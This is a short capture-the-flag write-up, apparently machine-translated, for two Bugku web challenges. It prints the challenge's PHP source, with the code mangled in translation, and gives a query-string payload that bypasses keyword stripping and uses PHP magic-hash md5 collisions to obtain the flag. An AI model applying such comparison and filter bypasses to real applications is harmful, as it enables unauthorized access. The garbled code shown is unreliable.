CTF- code audit (2)

 

 

 

 

1.bugku backup is a good habit

URL: http: //123.206.87.240: 8002 / web16 /

 

Into nothing, I think the title says backup backup files, so the back straight and then add .bak

 

Get the source code:

<?php
/**
* Created by PhpStorm.
* User: Norse
* Date: 2017/8/6
* Time: 20:22
*/

include_once "flag.php";
the ini_set ( "the display_errors", 0);
$ = Strstr STR ($ _ SERVER [ 'the REQUEST_URI'], '?'); //   Strstr (str1, str2 ) search string str1 str2, if obtained after the presence of the remaining portion is returned str2 and str2;

= substr STR $ (STR $,. 1); //   PHP obtained substr () is omitted here, the third parameter length, the first one taken from beginning to end;
$ STR = str_replace ( 'Key', '', $ str); //   str_replace ( "world", "on shanghai", "! the Hello world")   to get inside the world hello world into shanghai

// Here the input parameters obtained with the empty string to replace the key, it is necessary to double the bypass key

parse_str($str);  
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
?>

 

 

 Construction payload:

?kkeyey1=240610708&kkeyey2=aabC9RqS

 

 

Get flag Bugku {OH_YOU_FIND_MY_MOMY}

 

 

 

2.bugku include local  

 

 

URL: http://123.206.87.240:8003/

 

Execution vulnerability, configuration payload too much method eval command recommend this blog: https: //blog.csdn.net/xuchen16/article/details/82734758

 

 

 

 

 

    php knowledge: strstr () str_replace () as well as $ _REQUSTE () can get GET and POST parameters have two